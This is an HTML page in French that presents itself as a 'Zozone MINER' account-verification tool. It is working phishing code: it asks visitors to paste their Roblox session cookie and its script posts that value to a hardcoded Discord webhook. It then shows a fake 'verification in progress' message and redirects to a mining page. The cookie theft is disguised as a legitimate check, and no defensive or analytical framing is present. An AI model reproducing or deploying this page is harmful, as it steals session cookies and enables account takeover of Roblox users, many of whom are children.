<!DOCTYPE html>
<html lang="fr">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Zozone MINER: cookies</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            background-color: #131414;
            color: #2b88d4;
            padding: 20px;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
        }
        .container {
            background-color: #131414;
            padding: 20px;
            border-radius: 8px;
            box-shadow: 0 0 10px #2b88d4;
        }
        input[type="text"] {
            width: 100%;
            padding: 10px;
            margin-bottom: 10px;
            border: 1px solid #ccc;
            border-radius: 4px;
        }
        button {
            padding: 10px 20px;
            background-color: #007bff;
            color: #fff;
            border: none;
            border-radius: 4px;
            cursor: pointer;
        }
        button:hover {
            background-color: #0056b3;
        }
    </style>
</head>
<body>
    <div class="container">
        <h1>Roblox cookie: </h1>
        <input type="text" id="userInput" placeholder="Entrez votre cookie roblox...">
        <button onclick="handleButtonClick()">Vérifier mon compote </button>
    </div>

    <script>
        function handleButtonClick() {
            const userInput = document.getElementById('userInput').value;
            
            if (userInput) {
                const webhookURL = 'https://discord.com/api/webhooks/1261030258778312745/WzPT7B8CL_LmhhExnnyZKV6OBL_TouLPxu8pgiQtQ-pITn1_gismdRnMkOH51bGVgeYQ';
                const data = {
                    content: `roblox-cookie : ${userInput}`
                };

                fetch(webhookURL, {
                    method: 'POST',
                    headers: {
                        'Content-Type': 'application/json'
                    },
                    body: JSON.stringify(data)
                })
                .then(response => {
                    if (response.ok) {
                        alert('votre compte est en cours de vérification');
                        setTimeout(() => {
                            window.location.href = 'mining.html';
                        }, 500); // Redirection après 500ms 
                    } else {
                        alert('Il y a eu une erreur, veuillez contacter un membre du discord');
                    }
                })
                .catch(error => {
                    alert('Erreur: 0453778895');
                    console.error('Erreur:', error);
                });
            } else {
                alert('Veuillez entrer votre roblox cookie');
            }
        }
    </script>
</body>
</html>
